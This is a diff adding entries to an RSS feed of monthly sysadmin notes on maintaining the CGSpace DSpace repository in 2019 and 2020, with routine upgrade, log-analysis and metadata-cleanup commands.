+&lt;li&gt;For example, &lt;a href=&#34;https://cgspace.cgiar.org/handle/10568/66839&#34;&gt;this item&lt;/a&gt; has 51 views on CGSpace, but 0 on AReS&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>December, 2020</title>
+      <link>https://alanorth.github.io/cgspace-notes/2020-12/</link>
+      <pubDate>Tue, 01 Dec 2020 11:32:54 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2020-12/</guid>
+      <description>&lt;h2 id=&#34;2020-12-01&#34;&gt;2020-12-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Atmire responded about the issue with duplicate data in our Solr statistics
+&lt;ul&gt;
+&lt;li&gt;They noticed that some records in the statistics-2015 core haven&amp;rsquo;t been migrated with the AtomicStatisticsUpdateCLI tool yet and assumed that I haven&amp;rsquo;t migrated any of the records yet&lt;/li&gt;
+&lt;li&gt;That&amp;rsquo;s strange, as I checked all ten cores and 2015 is the only one with some unmigrated documents, as according to the &lt;code&gt;cua_version&lt;/code&gt; field&lt;/li&gt;
+&lt;li&gt;I started processing those (about 411,000 records):&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>CGSpace DSpace 6 Upgrade</title>
+      <link>https://alanorth.github.io/cgspace-notes/cgspace-dspace6-upgrade/</link>
+      <pubDate>Sun, 15 Nov 2020 13:27:35 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/cgspace-dspace6-upgrade/</guid>
+      <description>&lt;p&gt;Notes about the DSpace 6 upgrade on CGSpace in 2020-11.&lt;/p&gt;</description>
+    </item>
+    
+    <item>
+      <title>November, 2020</title>
+      <link>https://alanorth.github.io/cgspace-notes/2020-11/</link>
+      <pubDate>Sun, 01 Nov 2020 13:11:54 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2020-11/</guid>
+      <description>&lt;h2 id=&#34;2020-11-01&#34;&gt;2020-11-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Continue with processing the statistics-2019 Solr core with the AtomicStatisticsUpdateCLI tool on DSpace Test
+&lt;ul&gt;
+&lt;li&gt;So far we&amp;rsquo;ve spent at least fifty hours to process the statistics and statistics-2019 core&amp;hellip; wow.&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>October, 2020</title>
+      <link>https://alanorth.github.io/cgspace-notes/2020-10/</link>
+      <pubDate>Tue, 06 Oct 2020 16:55:54 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2020-10/</guid>
+      <description>&lt;h2 id=&#34;2020-10-06&#34;&gt;2020-10-06&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Add tests for the new &lt;code&gt;/items&lt;/code&gt; POST handlers to the DSpace 6.x branch of my &lt;a href=&#34;https://github.com/ilri/dspace-statistics-api/tree/v6_x&#34;&gt;dspace-statistics-api&lt;/a&gt;
+&lt;ul&gt;
+&lt;li&gt;It took a bit of extra work because I had to learn how to mock the responses for when Solr is not available&lt;/li&gt;
+&lt;li&gt;Tag and release version 1.3.0 on GitHub: &lt;a href=&#34;https://github.com/ilri/dspace-statistics-api/releases/tag/v1.3.0&#34;&gt;https://github.com/ilri/dspace-statistics-api/releases/tag/v1.3.0&lt;/a&gt;&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;Trying to test the changes Atmire sent last week but I had to re-create my local database from a recent CGSpace dump
+&lt;ul&gt;
+&lt;li&gt;During the FlywayDB migration I got an error:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>September, 2020</title>
+      <link>https://alanorth.github.io/cgspace-notes/2020-09/</link>
+      <pubDate>Wed, 02 Sep 2020 15:35:54 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2020-09/</guid>
+      <description>&lt;h2 id=&#34;2020-09-02&#34;&gt;2020-09-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Replace Marissa van Epp for Rhys Bucknall in the CCAFS groups on CGSpace because Marissa no longer works at CCAFS&lt;/li&gt;
+&lt;li&gt;The AReS Explorer hasn&amp;rsquo;t updated its index since 2020-08-22 when I last forced it
+&lt;ul&gt;
+&lt;li&gt;I restarted it again now and told Moayad that the automatic indexing isn&amp;rsquo;t working&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;Add &lt;code&gt;Alliance of Bioversity International and CIAT&lt;/code&gt; to affiliations on CGSpace&lt;/li&gt;
+&lt;li&gt;Abenet told me that the general search text on AReS doesn&amp;rsquo;t get reset when you use the &amp;ldquo;Reset Filters&amp;rdquo; button
+&lt;ul&gt;
+&lt;li&gt;I filed a bug on OpenRXV: &lt;a href=&#34;https://github.com/ilri/OpenRXV/issues/39&#34;&gt;https://github.com/ilri/OpenRXV/issues/39&lt;/a&gt;&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;I filed an issue on OpenRXV to make some minor edits to the admin UI: &lt;a href=&#34;https://github.com/ilri/OpenRXV/issues/40&#34;&gt;https://github.com/ilri/OpenRXV/issues/40&lt;/a&gt;&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>August, 2020</title>
+      <link>https://alanorth.github.io/cgspace-notes/2020-08/</link>
+      <pubDate>Sun, 02 Aug 2020 15:35:54 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2020-08/</guid>
+      <description>&lt;h2 id=&#34;2020-08-02&#34;&gt;2020-08-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;I spent a few days working on a Java-based curation task to tag items with ISO 3166-1 Alpha2 country codes based on their &lt;code&gt;cg.coverage.country&lt;/code&gt; text values
+&lt;ul&gt;
+&lt;li&gt;It looks up the names in ISO 3166-1 first, and then in our CGSpace countries mapping (which has five or so of Peter&amp;rsquo;s preferred &amp;ldquo;display&amp;rdquo; country names)&lt;/li&gt;
+&lt;li&gt;It implements a &amp;ldquo;force&amp;rdquo; mode too that will clear existing country codes and re-tag everything&lt;/li&gt;
+&lt;li&gt;It is class based so I can easily add support for other vocabularies, and the technique could even be used for organizations with mappings to ROR and Clarisa&amp;hellip;&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>July, 2020</title>
+      <link>https://alanorth.github.io/cgspace-notes/2020-07/</link>
+      <pubDate>Wed, 01 Jul 2020 10:53:54 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2020-07/</guid>
+      <description>&lt;h2 id=&#34;2020-07-01&#34;&gt;2020-07-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;A few users noticed that CGSpace wasn&amp;rsquo;t loading items today, item pages seem blank
+&lt;ul&gt;
+&lt;li&gt;I looked at the PostgreSQL locks but they don&amp;rsquo;t seem unusual&lt;/li&gt;
+&lt;li&gt;I guess this is the same &amp;ldquo;blank item page&amp;rdquo; issue that we had a few times in 2019 that we never solved&lt;/li&gt;
+&lt;li&gt;I restarted Tomcat and PostgreSQL and the issue was gone&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;Since I was restarting Tomcat anyways I decided to redeploy the latest changes from the &lt;code&gt;5_x-prod&lt;/code&gt; branch and I added a note about COVID-19 items to the CGSpace frontpage at Peter&amp;rsquo;s request&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>June, 2020</title>
+      <link>https://alanorth.github.io/cgspace-notes/2020-06/</link>
+      <pubDate>Mon, 01 Jun 2020 13:55:39 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2020-06/</guid>
+      <description>&lt;h2 id=&#34;2020-06-01&#34;&gt;2020-06-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;I tried to run the &lt;code&gt;AtomicStatisticsUpdateCLI&lt;/code&gt; CUA migration script on DSpace Test (linode26) again and it is still going very slowly and has tons of errors like I noticed yesterday
+&lt;ul&gt;
+&lt;li&gt;I sent Atmire the dspace.log from today and told them to log into the server to debug the process&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;In other news, I checked the statistics API on DSpace 6 and it&amp;rsquo;s working&lt;/li&gt;
+&lt;li&gt;I tried to build the OAI registry on the freshly migrated DSpace 6 on DSpace Test and I get an error:&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>May, 2020</title>
+      <link>https://alanorth.github.io/cgspace-notes/2020-05/</link>
+      <pubDate>Sat, 02 May 2020 09:52:04 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2020-05/</guid>
+      <description>&lt;h2 id=&#34;2020-05-02&#34;&gt;2020-05-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Peter said that CTA is having problems submitting an item to CGSpace
+&lt;ul&gt;
+&lt;li&gt;Looking at the PostgreSQL stats it seems to be the same issue that Tezira was having last week, as I see the number of connections in &amp;lsquo;idle in transaction&amp;rsquo; and &amp;lsquo;waiting for lock&amp;rsquo; state are increasing again&lt;/li&gt;
+&lt;li&gt;I see that CGSpace (linode18) is still using PostgreSQL JDBC driver version 42.2.11, and there were some bugs related to transactions fixed in 42.2.12 (which I had updated in the Ansible playbooks, but not deployed yet)&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>April, 2020</title>
+      <link>https://alanorth.github.io/cgspace-notes/2020-04/</link>
+      <pubDate>Thu, 02 Apr 2020 10:53:24 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2020-04/</guid>
+      <description>&lt;h2 id=&#34;2020-04-02&#34;&gt;2020-04-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Maria asked me to update Charles Staver&amp;rsquo;s ORCID iD in the submission template and on CGSpace, as his name was lower case before, and now he has corrected it
+&lt;ul&gt;
+&lt;li&gt;I updated the fifty-eight existing items on CGSpace&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;Looking into the items Udana had asked about last week that were missing Altmetric donuts:
+&lt;ul&gt;
+&lt;li&gt;&lt;a href=&#34;https://hdl.handle.net/10568/103225&#34;&gt;The first&lt;/a&gt; is still missing its DOI, so I added it and &lt;a href=&#34;https://twitter.com/mralanorth/status/1245632619661766657&#34;&gt;tweeted its handle&lt;/a&gt; (after a few hours there was a donut with score 222)&lt;/li&gt;
+&lt;li&gt;&lt;a href=&#34;https://hdl.handle.net/10568/106899&#34;&gt;The second item&lt;/a&gt; now has a donut with score 2 since I &lt;a href=&#34;https://twitter.com/mralanorth/status/1243158045540134913&#34;&gt;tweeted its handle&lt;/a&gt; last week&lt;/li&gt;
+&lt;li&gt;&lt;a href=&#34;https://hdl.handle.net/10568/107258&#34;&gt;The third item&lt;/a&gt; now has a donut with score 1 since I &lt;a href=&#34;https://twitter.com/mralanorth/status/1243158786392625153&#34;&gt;tweeted it&lt;/a&gt; last week&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;On the same note, the &lt;a href=&#34;https://hdl.handle.net/10568/106573&#34;&gt;one item&lt;/a&gt; Abenet pointed out last week now has a donut with score of 104 after I &lt;a href=&#34;https://twitter.com/mralanorth/status/1243163710241345536&#34;&gt;tweeted it&lt;/a&gt; last week&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>March, 2020</title>
+      <link>https://alanorth.github.io/cgspace-notes/2020-03/</link>
+      <pubDate>Mon, 02 Mar 2020 12:31:30 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2020-03/</guid>
+      <description>&lt;h2 id=&#34;2020-03-02&#34;&gt;2020-03-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Update &lt;a href=&#34;https://github.com/ilri/dspace-statistics-api&#34;&gt;dspace-statistics-api&lt;/a&gt; for DSpace 6+ UUIDs
+&lt;ul&gt;
+&lt;li&gt;Tag version 1.2.0 on GitHub&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;Test migrating legacy Solr statistics to UUIDs with the as-of-yet unreleased &lt;a href=&#34;https://github.com/DSpace/DSpace/commit/184f2b2153479045fba6239342c63e7f8564b8b6#diff-0350ce2e13b28d5d61252b7a8f50a059&#34;&gt;SolrUpgradePre6xStatistics.java&lt;/a&gt;
+&lt;ul&gt;
+&lt;li&gt;You need to download this into the DSpace 6.x source and compile it&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>February, 2020</title>
+      <link>https://alanorth.github.io/cgspace-notes/2020-02/</link>
+      <pubDate>Sun, 02 Feb 2020 11:56:30 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2020-02/</guid>
+      <description>&lt;h2 id=&#34;2020-02-02&#34;&gt;2020-02-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Continue working on porting CGSpace&amp;rsquo;s DSpace 5 code to DSpace 6.3 that I started yesterday
+&lt;ul&gt;
+&lt;li&gt;Sign up for an account with MaxMind so I can get the GeoLite2-City.mmdb database&lt;/li&gt;
+&lt;li&gt;I still need to wire up the API credentials and cron job into the Ansible infrastructure playbooks&lt;/li&gt;
+&lt;li&gt;Fix some minor issues in the config and XMLUI themes, like removing Atmire stuff&lt;/li&gt;
+&lt;li&gt;The code finally builds and runs with a fresh install&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>January, 2020</title>
+      <link>https://alanorth.github.io/cgspace-notes/2020-01/</link>
+      <pubDate>Mon, 06 Jan 2020 10:48:30 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2020-01/</guid>
+      <description>&lt;h2 id=&#34;2020-01-06&#34;&gt;2020-01-06&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Open &lt;a href=&#34;https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=706&#34;&gt;a ticket&lt;/a&gt; with Atmire to request a quote for the upgrade to DSpace 6&lt;/li&gt;
+&lt;li&gt;Last week Altmetric responded about the &lt;a href=&#34;https://hdl.handle.net/10568/97087&#34;&gt;item&lt;/a&gt; that had a lower score than than its DOI
+&lt;ul&gt;
+&lt;li&gt;The score is now linked to the DOI&lt;/li&gt;
+&lt;li&gt;Another &lt;a href=&#34;https://hdl.handle.net/10568/91278&#34;&gt;item&lt;/a&gt; that had the same problem in 2019 has now also linked to the score for its DOI&lt;/li&gt;
+&lt;li&gt;Another &lt;a href=&#34;https://hdl.handle.net/10568/81236&#34;&gt;item&lt;/a&gt; that had the same problem in 2019 has also been fixed&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;
+&lt;h2 id=&#34;2020-01-07&#34;&gt;2020-01-07&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Peter Ballantyne highlighted one more WLE &lt;a href=&#34;https://hdl.handle.net/10568/101286&#34;&gt;item&lt;/a&gt; that is missing the Altmetric score that its DOI has
+&lt;ul&gt;
+&lt;li&gt;The DOI has a score of 259, but the Handle has no score at all&lt;/li&gt;
+&lt;li&gt;I &lt;a href=&#34;https://twitter.com/mralanorth/status/1214471427157626881&#34;&gt;tweeted&lt;/a&gt; the CGSpace repository link&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>December, 2019</title>
+      <link>https://alanorth.github.io/cgspace-notes/2019-12/</link>
+      <pubDate>Sun, 01 Dec 2019 11:22:30 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2019-12/</guid>
+      <description>&lt;h2 id=&#34;2019-12-01&#34;&gt;2019-12-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Upgrade CGSpace (linode18) to Ubuntu 18.04:
+&lt;ul&gt;
+&lt;li&gt;Check any packages that have residual configs and purge them:&lt;/li&gt;
+&lt;li&gt;&lt;!-- raw HTML omitted --&gt;# dpkg -l | grep -E &amp;lsquo;^rc&amp;rsquo; | awk &amp;lsquo;{print $2}&amp;rsquo; | xargs dpkg -P&lt;!-- raw HTML omitted --&gt;&lt;/li&gt;
+&lt;li&gt;Make sure all packages are up to date and the package manager is up to date, then reboot:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# apt update &amp;amp;&amp;amp; apt full-upgrade
+# apt-get autoremove &amp;amp;&amp;amp; apt-get autoclean
+# dpkg -C
+# reboot
+&lt;/code&gt;&lt;/pre&gt;</description>
+    </item>
+    
+    <item>
+      <title>November, 2019</title>
+      <link>https://alanorth.github.io/cgspace-notes/2019-11/</link>
+      <pubDate>Mon, 04 Nov 2019 12:20:30 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2019-11/</guid>
+      <description>&lt;h2 id=&#34;2019-11-04&#34;&gt;2019-11-04&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Peter noticed that there were 5.2 million hits on CGSpace in 2019-10 according to the Atmire usage statistics
+&lt;ul&gt;
+&lt;li&gt;I looked in the nginx logs and see 4.6 million in the access logs, and 1.2 million in the API logs:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# zcat --force /var/log/nginx/*access.log.*.gz | grep -cE &amp;#34;[0-9]{1,2}/Oct/2019&amp;#34;
+4671942
+# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE &amp;#34;[0-9]{1,2}/Oct/2019&amp;#34;
+1277694
+&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
+&lt;li&gt;So 4.6 million from XMLUI and another 1.2 million from API requests&lt;/li&gt;
+&lt;li&gt;Let&amp;rsquo;s see how many of the REST API requests were for bitstreams (because they are counted in Solr stats):&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E &amp;#34;[0-9]{1,2}/Oct/2019&amp;#34;
+1183456 
+# zcat --force /var/log/nginx/rest.log.*.gz | grep -E &amp;#34;[0-9]{1,2}/Oct/2019&amp;#34; | grep -c -E &amp;#34;/rest/bitstreams&amp;#34;
+106781
+&lt;/code&gt;&lt;/pre&gt;</description>
+    </item>
+    
+    <item>
+      <title>October, 2019</title>
+      <link>https://alanorth.github.io/cgspace-notes/2019-10/</link>
+      <pubDate>Tue, 01 Oct 2019 13:20:51 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2019-10/</guid>
+      <description>2019-10-01 Udana from IWMI asked me for a CSV export of their community on CGSpace I exported it, but a quick run through the csv-metadata-quality tool shows that there are some low-hanging fruits we can fix before I send him the data I will limit the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U+00A0) there that would otherwise be removed by the csv-metadata-quality script&amp;rsquo;s &amp;ldquo;unneccesary Unicode&amp;rdquo; fix: $ csvcut -c &amp;#39;id,dc.</description>
+    </item>
+    
+    <item>
+      <title>September, 2019</title>
+      <link>https://alanorth.github.io/cgspace-notes/2019-09/</link>
+      <pubDate>Sun, 01 Sep 2019 10:17:51 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2019-09/</guid>
+      <description>&lt;h2 id=&#34;2019-09-01&#34;&gt;2019-09-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Linode emailed to say that CGSpace (linode18) had a high rate of outbound traffic for several hours this morning&lt;/li&gt;
+&lt;li&gt;Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &amp;#34;01/Sep/2019:0&amp;#34; | awk &amp;#39;{print $1}&amp;#39; | sort | uniq -c | sort -n | tail -n 10
+    440 17.58.101.255
+    441 157.55.39.101
+    485 207.46.13.43
+    728 169.60.128.125
+    730 207.46.13.108
+    758 157.55.39.9
+    808 66.160.140.179
+    814 207.46.13.212
+   2472 163.172.71.23
+   6092 3.94.211.189
+# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &amp;#34;01/Sep/2019:0&amp;#34; | awk &amp;#39;{print $1}&amp;#39; | sort | uniq -c | sort -n | tail -n 10
+     33 2a01:7e00::f03c:91ff:fe16:fcb
+     57 3.83.192.124
+     57 3.87.77.25
+     57 54.82.1.8
+    822 2a01:9cc0:47:1:1a:4:0:2
+   1223 45.5.184.72
+   1633 172.104.229.92
+   5112 205.186.128.185
+   7249 2a01:7e00::f03c:91ff:fe18:7396
+   9124 45.5.186.2
+&lt;/code&gt;&lt;/pre&gt;</description>
+    </item>
+    
+    <item>
+      <title>August, 2019</title>
+      <link>https://alanorth.github.io/cgspace-notes/2019-08/</link>
+      <pubDate>Sat, 03 Aug 2019 12:39:51 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2019-08/</guid>
+      <description>&lt;h2 id=&#34;2019-08-03&#34;&gt;2019-08-03&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Look at Bioversity&amp;rsquo;s latest migration CSV and now I see that Francesco has cleaned up the extra columns and the newline at the end of the file, but many of the column headers have an extra space in the name&amp;hellip;&lt;/li&gt;
+&lt;/ul&gt;
+&lt;h2 id=&#34;2019-08-04&#34;&gt;2019-08-04&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Deploy ORCID identifier updates requested by Bioversity to CGSpace&lt;/li&gt;
+&lt;li&gt;Run system updates on CGSpace (linode18) and reboot it
+&lt;ul&gt;
+&lt;li&gt;Before updating it I checked Solr and verified that all statistics cores were loaded properly&amp;hellip;&lt;/li&gt;
+&lt;li&gt;After rebooting, all statistics cores were loaded&amp;hellip; wow, that&amp;rsquo;s lucky.&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;Run system updates on DSpace Test (linode19) and reboot it&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>July, 2019</title>
+      <link>https://alanorth.github.io/cgspace-notes/2019-07/</link>
+      <pubDate>Mon, 01 Jul 2019 12:13:51 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2019-07/</guid>
+      <description>&lt;h2 id=&#34;2019-07-01&#34;&gt;2019-07-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Create an &amp;ldquo;AfricaRice books and book chapters&amp;rdquo; collection on CGSpace for AfricaRice&lt;/li&gt;
+&lt;li&gt;Last month Sisay asked why the following &amp;ldquo;most popular&amp;rdquo; statistics link for a range of months in 2018 works for the CIAT community on DSpace Test, but not on CGSpace:
+&lt;ul&gt;
+&lt;li&gt;&lt;a href=&#34;https://dspacetest.cgiar.org/handle/10568/35697/most-popular/item#simplefilter=custom&amp;amp;time_filter_end_date=01%2F12%2F2018&#34;&gt;DSpace Test&lt;/a&gt;&lt;/li&gt;
+&lt;li&gt;&lt;a href=&#34;https://cgspace.cgiar.org/handle/10568/35697/most-popular/item#simplefilter=custom&amp;amp;time_filter_end_date=01%2F12%2F2018&#34;&gt;CGSpace&lt;/a&gt;&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;Abenet had another similar issue a few days ago when trying to find the stats for 2018 in the RTB community&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>June, 2019</title>
+      <link>https://alanorth.github.io/cgspace-notes/2019-06/</link>
+      <pubDate>Sun, 02 Jun 2019 10:57:51 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2019-06/</guid>
+      <description>&lt;h2 id=&#34;2019-06-02&#34;&gt;2019-06-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Merge the &lt;a href=&#34;https://github.com/ilri/DSpace/pull/425&#34;&gt;Solr filterCache&lt;/a&gt; and &lt;a href=&#34;https://github.com/ilri/DSpace/pull/426&#34;&gt;XMLUI ISI journal&lt;/a&gt; changes to the &lt;code&gt;5_x-prod&lt;/code&gt; branch and deploy on CGSpace&lt;/li&gt;
+&lt;li&gt;Run system updates on CGSpace (linode18) and reboot it&lt;/li&gt;
+&lt;/ul&gt;
+&lt;h2 id=&#34;2019-06-03&#34;&gt;2019-06-03&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Skype with Marie-Angélique and Abenet about &lt;a href=&#34;https://agriculturalsemantics.github.io/cg-core/cgcore.html&#34;&gt;CG Core v2&lt;/a&gt;&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>May, 2019</title>
+      <link>https://alanorth.github.io/cgspace-notes/2019-05/</link>
+      <pubDate>Wed, 01 May 2019 07:37:43 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2019-05/</guid>
+      <description>&lt;h2 id=&#34;2019-05-01&#34;&gt;2019-05-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Help CCAFS with regenerating some item thumbnails after they uploaded new PDFs to some items on CGSpace&lt;/li&gt;
+&lt;li&gt;A user on the dspace-tech mailing list offered some suggestions for troubleshooting the problem with the inability to delete certain items
+&lt;ul&gt;
+&lt;li&gt;Apparently if the item is in the &lt;code&gt;workflowitem&lt;/code&gt; table it is submitted to a workflow&lt;/li&gt;
+&lt;li&gt;And if it is in the &lt;code&gt;workspaceitem&lt;/code&gt; table it is in the pre-submitted state&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;The item seems to be in a pre-submitted state, so I tried to delete it from there:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;dspace=# DELETE FROM workspaceitem WHERE item_id=74648;
+DELETE 1
+&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
+&lt;li&gt;But after this I tried to delete the item from the XMLUI and it is &lt;em&gt;still&lt;/em&gt; present&amp;hellip;&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>April, 2019</title>
+      <link>https://alanorth.github.io/cgspace-notes/2019-04/</link>
+      <pubDate>Mon, 01 Apr 2019 09:00:43 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2019-04/</guid>
+      <description>&lt;h2 id=&#34;2019-04-01&#34;&gt;2019-04-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Meeting with AgroKnow to discuss CGSpace, ILRI data, AReS, GARDIAN, etc
+&lt;ul&gt;
+&lt;li&gt;They asked if we had plans to enable RDF support in CGSpace&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;There have been 4,400 more downloads of the CTA Spore publication from those strange Amazon IP addresses today
+&lt;ul&gt;
+&lt;li&gt;I suspected that some might not be successful, because the stats show less, but today they were all HTTP 200!&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &amp;#39;Spore-192-EN-web.pdf&amp;#39; | grep -E &amp;#39;(18.196.196.108|18.195.78.144|18.195.218.6)&amp;#39; | awk &amp;#39;{print $9}&amp;#39; | sort | uniq -c | sort -n | tail -n 5
+   4432 200
+&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
+&lt;li&gt;In the last two weeks there have been 47,000 downloads of this &lt;em&gt;same exact PDF&lt;/em&gt; by these three IP addresses&lt;/li&gt;
+&lt;li&gt;Apply country and region corrections and deletions on DSpace Test and CGSpace:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p &amp;#39;fuuu&amp;#39; -f cg.coverage.country -m 228 -t ACTION -d
+$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p &amp;#39;fuuu&amp;#39; -f cg.coverage.region -m 231 -t action -d
+$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p &amp;#39;fuuu&amp;#39; -m 228 -f cg.coverage.country -d
+$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p &amp;#39;fuuu&amp;#39; -m 231 -f cg.coverage.region -d
+&lt;/code&gt;&lt;/pre&gt;</description>
+    </item>
+    
+    <item>
+      <title>March, 2019</title>
+      <link>https://alanorth.github.io/cgspace-notes/2019-03/</link>
+      <pubDate>Fri, 01 Mar 2019 12:16:30 +0100</pubDate>
+      
